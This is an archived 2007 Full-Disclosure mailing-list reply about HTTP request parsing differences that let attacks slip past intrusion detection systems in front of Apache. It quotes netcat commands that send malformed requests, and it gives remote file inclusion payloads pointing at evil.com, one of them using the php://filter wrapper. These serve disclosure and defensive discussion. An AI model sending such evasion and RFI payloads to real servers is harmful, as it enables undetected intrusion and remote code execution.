[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [Full-disclosure] IPS Evasion with the Apache HTTP Server

To: 3APA3A <3APA3A@xxxxxxxxxxxxxxxx>
Subject: Re: [Full-disclosure] IPS Evasion with the Apache HTTP Server
From: "Jamie Riden" <jamie.riden@xxxxxxxxx>
Date: Wed, 20 Jun 2007 13:39:21 +0100

On 20/06/07, 3APA3A <3APA3A@xxxxxxxxxxxxxxxx> wrote:
> Dear H D Moore,
>
> --Tuesday, June 19, 2007, 11:20:41 PM, you wrote to 
> full-disclosure@xxxxxxxxxxxxxxxxx:
>
> HDM> $  echo  -ne "\r\n\r\n\r\n\r\n\r\n /buggy.php HTTP/1.0\r\n\r\n" | \
> HDM> nc webserver 80
>
> According  to  recommendations  of  RFC  2616, section 4.1 Web server or
> proxy  server  should  ignore \r\n before request for compatibility with
> odd  clients  sending  trailing  \r\n  with POST requests via keep-alive
> connections:
>
>    In the interest of robustness, servers SHOULD ignore any empty
>    line(s) received where a Request-Line is expected. In other words, if
>    the server is reading the protocol stream at the beginning of a
>    message and receives a CRLF first, it should ignore the CRLF.
>
> $ echo -ne " /buggy.php HTTP/1.0\r\n\r\n" | nc webserver 80
>
> Does the same job. This problem (unsupported request method) was already
> reported by Michal Majchrowicz, see
>
> http://securityvulns.com/Qdocument846.html

(This is what I gathered from the original posting, but I might be wrong.)

I think the issue is not that the apache server behaviour is wrong as
such, but that IDS/IPS do not use the same algorithm as apache for
checking validity of HTTP requests. Thus apache may accept and process
a request like:

\r\n\r\n\r\n\r\n\r\n\x0c/rfi.php?includedir=http://evil.com\x0bHTTP/1.0\r\n\r\n

but that the IDS/IPS will ignore that packet on the grounds that "it's
not a valid HTTP request"., when it should actually be alerting that a
RFI attempt was made.

While we're on the subject of IDS, it looks like PHP 5 supports a new
wrapper php://filter, such that a RFI may be performed by: GET
/rfi.php?includedir=php://filter/resource=http://www.evil.com - which
may not be detected by some existing IDS signatures. (See
http://uk2.php.net/manual/en/wrappers.php.php )

cheers,
 Jamie
-- 
Jamie Riden / jamesr@xxxxxxxxxx / jamie@xxxxxxxxxxxxxxx
UK Honeynet Project: http://www.ukhoneynet.org/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Follow-Ups:
- Re: [Full-disclosure] IPS Evasion with the Apache HTTP Server
  - From: 3APA3A

References:
- [Full-disclosure] IPS Evasion with the Apache HTTP Server
  - From: H D Moore
- Re: [Full-disclosure] IPS Evasion with the Apache HTTP Server
  - From: 3APA3A

Prev by Date: Re: [Full-disclosure] IPS Evasion with the Apache HTTP Server
Next by Date: Re: [Full-disclosure] IPS Evasion with the Apache HTTP Server
Previous by thread: Re: [Full-disclosure] IPS Evasion with the Apache HTTP Server
Next by thread: Re: [Full-disclosure] IPS Evasion with the Apache HTTP Server
Index(es):
- Date
- Thread